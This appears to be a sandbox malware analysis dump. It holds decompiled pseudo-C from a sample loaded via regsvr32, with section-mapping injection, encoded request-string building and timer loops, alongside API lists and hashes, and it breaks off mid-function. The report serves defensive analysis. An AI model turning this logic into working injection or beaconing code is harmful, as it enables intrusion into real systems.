                                                  0x005e1ec5
                                                  0x005e1ec6
                                                  0x005e1ec7
                                                  0x005e1ec8
                                                  0x005e1ec9
                                                  0x005e1eda
                                                  0x005e1ede
                                                  0x005e1ef2
                                                  0x005e1ef5
                                                  0x005e1ef8
                                                  0x005e1eff
                                                  0x005e1f02
                                                  0x005e1f09
                                                  0x005e1f0c
                                                  0x005e1f0f
                                                  0x005e1f12
                                                  0x005e1f17
                                                  0x005e1f52
                                                  0x005e1f19
                                                  0x005e1f1c
                                                  0x005e1f22
                                                  0x005e1f27
                                                  0x005e1f2b
                                                  0x005e1f49
                                                  0x005e1f2d
                                                  0x005e1f34
                                                  0x005e1f42
                                                  0x005e1f42
                                                  0x005e1f2b
                                                  0x005e1f5a

                                                  APIs
                                                  • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 005E1F12
                                                    • Part of subcall function 005E1D9F: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,005E1F27,00000002,00000000,?,?,00000000,?,?,005E1F27,00000002), ref: 005E1DCC
                                                  • memset.NTDLL ref: 005E1F34
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, Offset: 005E0000, based on PE: true
                                                  • Associated: 00000002.00000002.646415549.00000000005E5000.00000040.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_5e0000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Section$CreateViewmemset
                                                  • String ID: @
                                                  • API String ID: 2533685722-2766056989
                                                  • Opcode ID: ee04d3b80f2aa96c2028224801f0ff00ef799990c629de64b363f9b0c8c139ed
                                                  • Instruction ID: 6c7f545db4368c6a85559686398c4cf0a4e8c0432a35785fac6cbb73ade71e19
                                                  • Opcode Fuzzy Hash: ee04d3b80f2aa96c2028224801f0ff00ef799990c629de64b363f9b0c8c139ed
                                                  • Instruction Fuzzy Hash: 15211DB1D00609AFDB11DFA9C8849EEFBB9FF48354F104469E656F3210D7309A488BA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 68%
                                                  			E005E1D9F(void** __esi, PVOID* _a4) {
                                                  				long _v8;
                                                  				void* _v12;
                                                  				void* _v16;
                                                  				long _t13;
                                                  
                                                  				_v16 = 0;
                                                  				asm("stosd");
                                                  				_v8 = 0;
                                                  				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                                  				if(_t13 < 0) {
                                                  					_push(_t13);
                                                  					return __esi[6]();
                                                  				}
                                                  				return 0;
                                                  			}
                                                  0x005e1db1
                                                  0x005e1db7
                                                  0x005e1dc5
                                                  0x005e1dcc
                                                  0x005e1dd1
                                                  0x005e1dd7
                                                  0x00000000
                                                  0x005e1dd8
                                                  0x00000000

                                                  APIs
                                                  • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,005E1F27,00000002,00000000,?,?,00000000,?,?,005E1F27,00000002), ref: 005E1DCC
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, Offset: 005E0000, based on PE: true
                                                  • Associated: 00000002.00000002.646415549.00000000005E5000.00000040.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_5e0000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SectionView
                                                  • String ID:
                                                  • API String ID: 1323581903-0
                                                  • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                  • Instruction ID: fdcf1f80b0eeec7111902db50ea9e749526b08ff949265d29be9d8a2c52984f7
                                                  • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                  • Instruction Fuzzy Hash: 74F012F590064CBFDB119FA5CC85C9FBBBDEB44394B104E79B152E1090D6309E089A60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 74%
                                                  			E00C88B94(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                                  				void* _v8;
                                                  				signed int _v12;
                                                  				void* _v16;
                                                  				void* _v20;
                                                  				void* _v24;
                                                  				void* _v28;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				long _t59;
                                                  				intOrPtr _t60;
                                                  				intOrPtr _t61;
                                                  				intOrPtr _t62;
                                                  				intOrPtr _t63;
                                                  				intOrPtr _t64;
                                                  				void* _t67;
                                                  				intOrPtr _t68;
                                                  				int _t71;
                                                  				void* _t72;
                                                  				void* _t73;
                                                  				void* _t75;
                                                  				void* _t78;
                                                  				intOrPtr _t82;
                                                  				intOrPtr _t86;
                                                  				intOrPtr* _t88;
                                                  				void* _t94;
                                                  				intOrPtr _t101;
                                                  				signed int _t105;
                                                  				char** _t107;
                                                  				int _t110;
                                                  				signed int _t112;
                                                  				intOrPtr* _t113;
                                                  				intOrPtr* _t115;
                                                  				intOrPtr* _t117;
                                                  				intOrPtr* _t119;
                                                  				intOrPtr _t122;
                                                  				intOrPtr _t127;
                                                  				int _t131;
                                                  				CHAR* _t133;
                                                  				intOrPtr _t134;
                                                  				void* _t135;
                                                  				void* _t144;
                                                  				int _t145;
                                                  				void* _t146;
                                                  				intOrPtr _t147;
                                                  				void* _t149;
                                                  				long _t153;
                                                  				intOrPtr* _t154;
                                                  				intOrPtr* _t155;
                                                  				intOrPtr* _t158;
                                                  				void* _t159;
                                                  				void* _t161;
                                                  
                                                  				_t144 = __edx;
                                                  				_t135 = __ecx;
                                                  				_t59 = __eax;
                                                  				_v12 = 8;
                                                  				if(__eax == 0) {
                                                  					_t59 = GetTickCount();
                                                  				}
                                                  				_t60 =  *0xc8d018; // 0xf56cfa1f
                                                  				asm("bswap eax");
                                                  				_t61 =  *0xc8d014; // 0x3a87c8cd
                                                  				_t133 = _a16;
                                                  				asm("bswap eax");
                                                  				_t62 =  *0xc8d010; // 0xd8d2f808
                                                  				asm("bswap eax");
                                                  				_t63 =  *0xc8d00c; // 0x8f8f86c2
                                                  				asm("bswap eax");
                                                  				_t64 =  *0xc8d27c; // 0x41a5a8
                                                  				_t3 = _t64 + 0xc8e633; // 0x74666f73
                                                  				_t145 = wsprintfA(_t133, _t3, 3, 0x3d14b, _t63, _t62, _t61, _t60,  *0xc8d02c,  *0xc8d004, _t59);
                                                  				_t67 = E00C81C1A();
                                                  				_t68 =  *0xc8d27c; // 0x41a5a8
                                                  				_t4 = _t68 + 0xc8e673; // 0x74707526
                                                  				_t71 = wsprintfA(_t145 + _t133, _t4, _t67);
                                                  				_t161 = _t159 + 0x38;
                                                  				_t146 = _t145 + _t71; // executed
                                                  				_t72 = E00C854BC(_t135); // executed
                                                  				_t134 = __imp__;
                                                  				_v8 = _t72;
                                                  				if(_t72 != 0) {
                                                  					_t127 =  *0xc8d27c; // 0x41a5a8
                                                  					_t7 = _t127 + 0xc8e8eb; // 0x736e6426
                                                  					_t131 = wsprintfA(_a16 + _t146, _t7, _t72);
                                                  					_t161 = _t161 + 0xc;
                                                  					_t146 = _t146 + _t131;
                                                  					HeapFree( *0xc8d238, 0, _v8);
                                                  				}
                                                  				_t73 = E00C87649();
                                                  				_v8 = _t73;
                                                  				if(_t73 != 0) {
                                                  					_t122 =  *0xc8d27c; // 0x41a5a8
                                                  					_t11 = _t122 + 0xc8e8f3; // 0x6f687726
                                                  					wsprintfA(_t146 + _a16, _t11, _t73);
                                                  					_t161 = _t161 + 0xc;
                                                  					HeapFree( *0xc8d238, 0, _v8);
                                                  				}
                                                  				_t147 =  *0xc8d32c; // 0x10a95b0
                                                  				_t75 = E00C89395(0xc8d00a, _t147 + 4);
                                                  				_t153 = 0;
                                                  				_v20 = _t75;
                                                  				if(_t75 == 0) {
                                                  					L26:
                                                  					RtlFreeHeap( *0xc8d238, _t153, _a16); // executed
                                                  					return _v12;
                                                  				} else {
                                                  					_t78 = RtlAllocateHeap( *0xc8d238, 0, 0x800);
                                                  					_v8 = _t78;
                                                  					if(_t78 == 0) {
                                                  						L25:
                                                  						HeapFree( *0xc8d238, _t153, _v20);
                                                  						goto L26;
                                                  					}
                                                  					E00C87A80(GetTickCount());
                                                  					_t82 =  *0xc8d32c; // 0x10a95b0
                                                  					__imp__(_t82 + 0x40);
                                                  					asm("lock xadd [eax], ecx");
                                                  					_t86 =  *0xc8d32c; // 0x10a95b0
                                                  					__imp__(_t86 + 0x40);
                                                  					_t88 =  *0xc8d32c; // 0x10a95b0
                                                  					_t149 = E00C88307(1, _t144, _a16,  *_t88);
                                                  					_v28 = _t149;
                                                  					asm("lock xadd [eax], ecx");
                                                  					if(_t149 == 0) {
                                                  						L24:
                                                  						HeapFree( *0xc8d238, _t153, _v8);
                                                  						goto L25;
                                                  					}
                                                  					StrTrimA(_t149, 0xc8c2ac);
                                                  					_push(_t149);
                                                  					_t94 = E00C83CC8();
                                                  					_v16 = _t94;
                                                  					if(_t94 == 0) {
                                                  						L23:
                                                  						HeapFree( *0xc8d238, _t153, _t149);
                                                  						goto L24;
                                                  					}
                                                  					_t154 = __imp__;
                                                  					 *_t154(_t149, _a4);
                                                  					 *_t154(_v8, _v20);
                                                  					_t155 = __imp__;
                                                  					 *_t155(_v8, _v16);
                                                  					 *_t155(_v8, _t149);
                                                  					_t101 = E00C8809F(0, _v8);
                                                  					_a4 = _t101;
                                                  					if(_t101 == 0) {
                                                  						_v12 = 8;
                                                  						L21:
                                                  						E00C8A1B0();
                                                  						L22:
                                                  						HeapFree( *0xc8d238, 0, _v16);
                                                  						_t153 = 0;
                                                  						goto L23;
                                                  					}
                                                  					_t105 = E00C843DF(_t134, 0xffffffffffffffff, _t149,  &_v24); // executed
                                                  					_v12 = _t105;
                                                  					if(_t105 == 0) {
                                                  						_t158 = _v24;
                                                  						_t112 = E00C8163F(_t158, _a4, _a8, _a12); // executed
                                                  						_v12 = _t112;
                                                  						_t113 =  *((intOrPtr*)(_t158 + 8));
                                                  						 *((intOrPtr*)( *_t113 + 0x80))(_t113);
                                                  						_t115 =  *((intOrPtr*)(_t158 + 8));
                                                  						 *((intOrPtr*)( *_t115 + 8))(_t115);
                                                  						_t117 =  *((intOrPtr*)(_t158 + 4));
                                                  						 *((intOrPtr*)( *_t117 + 8))(_t117);
                                                  						_t119 =  *_t158;
                                                  						 *((intOrPtr*)( *_t119 + 8))(_t119);
                                                  						E00C89039(_t158);
                                                  					}
                                                  					if(_v12 != 0x10d2) {
                                                  						L16:
                                                  						if(_v12 == 0) {
                                                  							_t107 = _a8;
                                                  							if(_t107 != 0) {
                                                  								_t150 =  *_t107;
                                                  								_t156 =  *_a12;
                                                  								wcstombs( *_t107,  *_t107,  *_a12);
                                                  								_t110 = E00C885DB(_t150, _t150, _t156 >> 1);
                                                  								_t149 = _v28;
                                                  								 *_a12 = _t110;
                                                  							}
                                                  						}
                                                  						goto L19;
                                                  					} else {
                                                  						if(_a8 != 0) {
                                                  							L19:
                                                  							E00C89039(_a4);
                                                  							if(_v12 == 0 || _v12 == 0x10d2) {
                                                  								goto L22;
                                                  							} else {
                                                  								goto L21;
                                                  							}
                                                  						}
                                                  						_v12 = _v12 & 0x00000000;
                                                  						goto L16;
                                                  					}
                                                  				}
                                                  			}

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00C88BA8
                                                  • wsprintfA.USER32 ref: 00C88BF8
                                                  • wsprintfA.USER32 ref: 00C88C15
                                                  • wsprintfA.USER32 ref: 00C88C41
                                                  • HeapFree.KERNEL32(00000000,?), ref: 00C88C53
                                                  • wsprintfA.USER32 ref: 00C88C74
                                                  • HeapFree.KERNEL32(00000000,?), ref: 00C88C84
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00C88CB2
                                                  • GetTickCount.KERNEL32 ref: 00C88CC3
                                                  • RtlEnterCriticalSection.NTDLL(010A9570), ref: 00C88CD7
                                                  • RtlLeaveCriticalSection.NTDLL(010A9570), ref: 00C88CF5
                                                    • Part of subcall function 00C88307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,00C8A428,?,010A95B0), ref: 00C88332
                                                    • Part of subcall function 00C88307: lstrlen.KERNEL32(?,?,?,00C8A428,?,010A95B0), ref: 00C8833A
                                                    • Part of subcall function 00C88307: strcpy.NTDLL ref: 00C88351
                                                    • Part of subcall function 00C88307: lstrcat.KERNEL32(00000000,?), ref: 00C8835C
                                                    • Part of subcall function 00C88307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00C8A428,?,010A95B0), ref: 00C88379
                                                  • StrTrimA.SHLWAPI(00000000,00C8C2AC,?,010A95B0), ref: 00C88D2C
                                                    • Part of subcall function 00C83CC8: lstrlen.KERNEL32(010A87FA,00000000,00000000,74ECC740,00C8A453,00000000), ref: 00C83CD8
                                                    • Part of subcall function 00C83CC8: lstrlen.KERNEL32(?), ref: 00C83CE0
                                                    • Part of subcall function 00C83CC8: lstrcpy.KERNEL32(00000000,010A87FA), ref: 00C83CF4
                                                    • Part of subcall function 00C83CC8: lstrcat.KERNEL32(00000000,?), ref: 00C83CFF
                                                  • lstrcpy.KERNEL32(00000000,?), ref: 00C88D4D
                                                  • lstrcpy.KERNEL32(?,?), ref: 00C88D55
                                                  • lstrcat.KERNEL32(?,?), ref: 00C88D63
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00C88D69
                                                    • Part of subcall function 00C8809F: lstrlen.KERNEL32(?,00000000,00C8D330,00000001,00C82200,00C8D00C,00C8D00C,00000000,00000005,00000000,00000000,?,?,?,00C896C1,00C823E9), ref: 00C880A8
                                                    • Part of subcall function 00C8809F: mbstowcs.NTDLL ref: 00C880CF
                                                    • Part of subcall function 00C8809F: memset.NTDLL ref: 00C880E1
                                                  • wcstombs.NTDLL ref: 00C88DFC
                                                    • Part of subcall function 00C8163F: SysAllocString.OLEAUT32(?), ref: 00C81680
                                                    • Part of subcall function 00C8163F: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 00C81702
                                                    • Part of subcall function 00C8163F: StrStrIW.SHLWAPI(?,006E0069), ref: 00C81741
                                                    • Part of subcall function 00C89039: HeapFree.KERNEL32(00000000,00000000,00C87F18,00000000,?,?,00000000), ref: 00C89045
                                                  • HeapFree.KERNEL32(00000000,?,?), ref: 00C88E3D
                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00C88E49
                                                  • HeapFree.KERNEL32(00000000,?,?,010A95B0), ref: 00C88E55
                                                  • HeapFree.KERNEL32(00000000,?), ref: 00C88E61
                                                  • RtlFreeHeap.NTDLL(00000000,?), ref: 00C88E6D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                                  • String ID:
                                                  • API String ID: 603507560-0
                                                  • Opcode ID: f9e837dcb33f7d2204771a6c35a9e5ecb4831e1dfebc9b5858a6c354e502959e
                                                  • Instruction ID: cfb2ac93035a77851faf70d0b951722509d530f242a88caa7f196431a7bb291f
                                                  • Opcode Fuzzy Hash: f9e837dcb33f7d2204771a6c35a9e5ecb4831e1dfebc9b5858a6c354e502959e
                                                  • Instruction Fuzzy Hash: 05912871900208EFCB11EFA4DC88BAE7BB9EF48354F144055F906E72A0DB319D55EB69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 83%
                                                  			E00C86786(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                  				struct %anon52 _v8;
                                                  				long _v12;
                                                  				char _v16;
                                                  				char _v20;
                                                  				signed int _v24;
                                                  				intOrPtr _v32;
                                                  				union _LARGE_INTEGER _v36;
                                                  				intOrPtr _v40;
                                                  				void* _v44;
                                                  				void _v88;
                                                  				char _v92;
                                                  				struct %anon52 _t46;
                                                  				intOrPtr _t51;
                                                  				long _t53;
                                                  				void* _t54;
                                                  				struct %anon52 _t60;
                                                  				long _t64;
                                                  				signed int _t65;
                                                  				void* _t68;
                                                  				void* _t70;
                                                  				signed int _t71;
                                                  				intOrPtr _t73;
                                                  				intOrPtr _t76;
                                                  				void** _t78;
                                                  				void* _t80;
                                                  
                                                  				_t73 = __edx;
                                                  				_v92 = 0;
                                                  				memset( &_v88, 0, 0x2c);
                                                  				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                  				_v44 = _t46;
                                                  				if(_t46 == 0) {
                                                  					_v8.LowPart = GetLastError();
                                                  				} else {
                                                  					_push(0xffffffff);
                                                  					_push(0xff676980);
                                                  					_push(0);
                                                  					_push( *0xc8d240);
                                                  					_v20 = 0;
                                                  					_v16 = 0;
                                                  					L00C8B0C8();
                                                  					_v36.LowPart = _t46;
                                                  					_v32 = _t73;
                                                  					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                  					_t51 =  *0xc8d26c; // 0x2c8
                                                  					_v40 = _t51;
                                                  					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                  					_v8.LowPart = _t53;
                                                  					if(_t53 == 0) {
                                                  						if(_a8 != 0) {
                                                  							L4:
                                                  							 *0xc8d24c = 5;
                                                  						} else {
                                                  							_t68 = E00C873FD(_t73); // executed
                                                  							if(_t68 != 0) {
                                                  								goto L4;
                                                  							}
                                                  						}
                                                  						_v12 = 0;
                                                  						L6:
                                                  						L6:
                                                  						if(_v12 == 1 && ( *0xc8d260 & 0x00000001) == 0) {
                                                  							_v12 = 2;
                                                  						}
                                                  						_t71 = _v12;
                                                  						_t58 = _t71 << 4;
                                                  						_t76 = _t80 + (_t71 << 4) - 0x54;
                                                  						_t72 = _t71 + 1;
                                                  						_v24 = _t71 + 1;
                                                  						_t60 = E00C88504(_t72, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
                                                  						_v8.LowPart = _t60;
                                                  						if(_t60 != 0) {
                                                  							goto L17;
                                                  						}
                                                  						_t65 = _v24;
                                                  						_t90 = _t65 - 3;
                                                  						_v12 = _t65;
                                                  						if(_t65 != 3) {
                                                  							goto L6;
                                                  						} else {
                                                  							_v8.LowPart = E00C83BF1(_t72, _t90,  &_v92, _a4, _a8);
                                                  						}
                                                  						goto L12;
                                                  						L17:
                                                  						__eflags = _t60 - 0x10d2;
                                                  						if(_t60 != 0x10d2) {
                                                  							_push(0xffffffff);
                                                  							_push(0xff676980);
                                                  							_push(0);
                                                  							_push( *0xc8d244);
                                                  							goto L21;
                                                  						} else {
                                                  							__eflags =  *0xc8d248; // 0x0
                                                  							if(__eflags == 0) {
                                                  								goto L12;
                                                  							} else {
                                                  								_t60 = E00C8A1B0();
                                                  								_push(0xffffffff);
                                                  								_push(0xdc3cba00);
                                                  								_push(0);
                                                  								_push( *0xc8d248);
                                                  								L21:
                                                  								L00C8B0C8();
                                                  								_v36.LowPart = _t60;
                                                  								_v32 = _t76;
                                                  								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
                                                  								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                  								__eflags = _t64;
                                                  								_v8.LowPart = _t64;
                                                  								if(_t64 == 0) {
                                                  									goto L6;
                                                  								} else {
                                                  									goto L12;
                                                  								}
                                                  							}
                                                  						}
                                                  						L25:
                                                  					}
                                                  					L12:
                                                  					_t78 =  &_v92;
                                                  					_t70 = 3;
                                                  					do {
                                                  						_t54 =  *_t78;
                                                  						if(_t54 != 0) {
                                                  							HeapFree( *0xc8d238, 0, _t54);
                                                  						}
                                                  						_t78 =  &(_t78[4]);
                                                  						_t70 = _t70 - 1;
                                                  					} while (_t70 != 0);
                                                  					CloseHandle(_v44);
                                                  				}
                                                  				return _v8;
                                                  				goto L25;
                                                  			}

                                                  APIs
                                                  • memset.NTDLL ref: 00C8679B
                                                  • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00C867A7
                                                  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00C867CC
                                                  • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00C867E8
                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00C86801
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00C86897
                                                  • CloseHandle.KERNEL32(?), ref: 00C868A6
                                                  • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00C868E0
                                                  • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00C82417,?), ref: 00C868F6
                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00C86901
                                                    • Part of subcall function 00C873FD: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,010A9388,00000000,?,7519F710,00000000,7519F730), ref: 00C8744C
                                                    • Part of subcall function 00C873FD: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,010A93C0,?,00000000,30314549,00000014,004F0053,010A937C), ref: 00C874E9
                                                    • Part of subcall function 00C873FD: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00C86814), ref: 00C874FB
                                                  • GetLastError.KERNEL32 ref: 00C86913
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                  • String ID:
                                                  • API String ID: 3521023985-0
                                                  • Opcode ID: 5a9695bbc5d47705e478608554d5df1f29ebacbfe23c2a749a08899c6bf0dfda
                                                  • Instruction ID: ec76c38ca198fb25e1895be00598383cc13cf93099c75db7003dcbfb0e0aafa2
                                                  • Opcode Fuzzy Hash: 5a9695bbc5d47705e478608554d5df1f29ebacbfe23c2a749a08899c6bf0dfda
                                                  • Instruction Fuzzy Hash: 8C516DB1801228EBDF10EF94DC84EEEBFB9EF49368F204116F415A2191D7749A44DBA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  (rendered control-flow graph for basic blocks 5e163f-5e1742 omitted; nodes were marked Executed / Not Executed in the original view)
                                                  C-Code - Quality: 79%
                                                  			E005E163F(char _a4) {
                                                  				long _v8;
                                                  				struct _SYSTEMTIME _v24;
                                                  				char _v48;
                                                  				void* __edi;
                                                  				long _t20;
                                                  				int _t22;
                                                  				long _t25;
                                                  				long _t26;
                                                  				long _t30;
                                                  				void* _t36;
                                                  				intOrPtr _t38;
                                                  				intOrPtr _t43;
                                                  				signed int _t44;
                                                  				void* _t48;
                                                  				signed int _t51;
                                                  				void* _t54;
                                                  				intOrPtr* _t55;
                                                  
                                                  				_t20 = E005E1850();
                                                  				_v8 = _t20;
                                                  				if(_t20 != 0) {
                                                  					return _t20;
                                                  				}
                                                  				do {
                                                  					GetSystemTime( &_v24);
                                                  					_t22 = SwitchToThread();
                                                  					asm("cdq");
                                                  					_t44 = 9;
                                                  					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
                                                  					_t25 = E005E18F4(0, _t51); // executed
                                                  					_v8 = _t25;
                                                  					Sleep(_t51 << 5); // executed
                                                  					_t26 = _v8;
                                                  				} while (_t26 == 0xc);
                                                  				if(_t26 != 0) {
                                                  					L18:
                                                  					return _t26;
                                                  				}
                                                  				if(_a4 != 0) {
                                                  					L11:
                                                  					_push(0);
                                                  					_t54 = E005E12DC(E005E135A,  &_v48);
                                                  					if(_t54 == 0) {
                                                  						_v8 = GetLastError();
                                                  					} else {
                                                  						_t30 = WaitForSingleObject(_t54, 0xffffffff);
                                                  						_v8 = _t30;
                                                  						if(_t30 == 0) {
                                                  							GetExitCodeThread(_t54,  &_v8);
                                                  						}
                                                  						CloseHandle(_t54);
                                                  					}
                                                  					_t26 = _v8;
                                                  					if(_t26 == 0xffffffff) {
                                                  						_t26 = GetLastError();
                                                  					}
                                                  					goto L18;
                                                  				}
                                                  				if(E005E1538(_t44,  &_a4) != 0) {
                                                  					 *0x5e4138 = 0;
                                                  					goto L11;
                                                  				}
                                                  				_t43 = _a4;
                                                  				_t55 = __imp__GetLongPathNameW;
                                                  				_t36 =  *_t55(_t43, 0, 0); // executed
                                                  				_t48 = _t36;
                                                  				if(_t48 == 0) {
                                                  					L9:
                                                  					 *0x5e4138 = _t43;
                                                  					goto L11;
                                                  				}
                                                  				_t14 = _t48 + 2; // 0x2
                                                  				_t38 = E005E1DE1(_t48 + _t14);
                                                  				 *0x5e4138 = _t38;
                                                  				if(_t38 == 0) {
                                                  					goto L9;
                                                  				}
                                                  				 *_t55(_t43, _t38, _t48); // executed
                                                  				E005E1DFC(_t43);
                                                  				goto L11;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 005E1850: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,005E164B,751463F0), ref: 005E185F
                                                    • Part of subcall function 005E1850: GetVersion.KERNEL32 ref: 005E186E
                                                    • Part of subcall function 005E1850: GetCurrentProcessId.KERNEL32 ref: 005E1885
                                                    • Part of subcall function 005E1850: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 005E189E
                                                  • GetSystemTime.KERNEL32(?,00000000,751463F0), ref: 005E165D
                                                  • SwitchToThread.KERNEL32 ref: 005E1663
                                                    • Part of subcall function 005E18F4: VirtualAlloc.KERNELBASE(00000000,005E167D,00003000,00000004,?,?,005E167D,00000000), ref: 005E194A
                                                    • Part of subcall function 005E18F4: memcpy.NTDLL(?,?,005E167D,?,?,005E167D,00000000), ref: 005E19DC
                                                    • Part of subcall function 005E18F4: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,005E167D,00000000), ref: 005E19F7
                                                  • Sleep.KERNELBASE(00000000,00000000), ref: 005E1684
                                                  • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 005E16B9
                                                  • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 005E16D7
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 005E170F
                                                  • GetExitCodeThread.KERNEL32(00000000,?), ref: 005E1721
                                                  • CloseHandle.KERNEL32(00000000), ref: 005E1728
                                                  • GetLastError.KERNEL32(?,00000000), ref: 005E1730
                                                  • GetLastError.KERNEL32 ref: 005E173D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, Offset: 005E0000, based on PE: true
                                                  • Associated: 00000002.00000002.646415549.00000000005E5000.00000040.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_5e0000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
                                                  • String ID:
                                                  • API String ID: 2280543912-0
                                                  • Opcode ID: 10aea305b3c4b76526e40e787023aa5f3484f04c01f9b027ef39699f8d400185
                                                  • Instruction ID: 7fc2ec1e3bb399e1b50c16c43b31b010de004115b79e2151c3a695ae51b1e1f2
                                                  • Opcode Fuzzy Hash: 10aea305b3c4b76526e40e787023aa5f3484f04c01f9b027ef39699f8d400185
                                                  • Instruction Fuzzy Hash: C631C271900A95ABCB18EBE6DC8C9AE7EBDFF94360B150516E980D7140E730CB00EB69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  (rendered control-flow graph for basic blocks 5e102f-5e10fe omitted; nodes were marked Executed / Not Executed in the original view)
                                                  C-Code - Quality: 69%
                                                  			E005E102F(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                  				intOrPtr _v12;
                                                  				struct _FILETIME* _v16;
                                                  				short _v60;
                                                  				struct _FILETIME* _t14;
                                                  				intOrPtr _t15;
                                                  				long _t18;
                                                  				void* _t19;
                                                  				void* _t22;
                                                  				intOrPtr _t31;
                                                  				long _t32;
                                                  				void* _t34;
                                                  
                                                  				_t31 = __edx;
                                                  				_t14 =  &_v16;
                                                  				GetSystemTimeAsFileTime(_t14);
                                                  				_push(0x192);
                                                  				_push(0x54d38000);
                                                  				_push(_v12);
                                                  				_push(_v16);
                                                  				L005E2100();
                                                  				_push(_t14);
                                                  				_v16 = _t14;
                                                  				_t15 =  *0x5e4150;
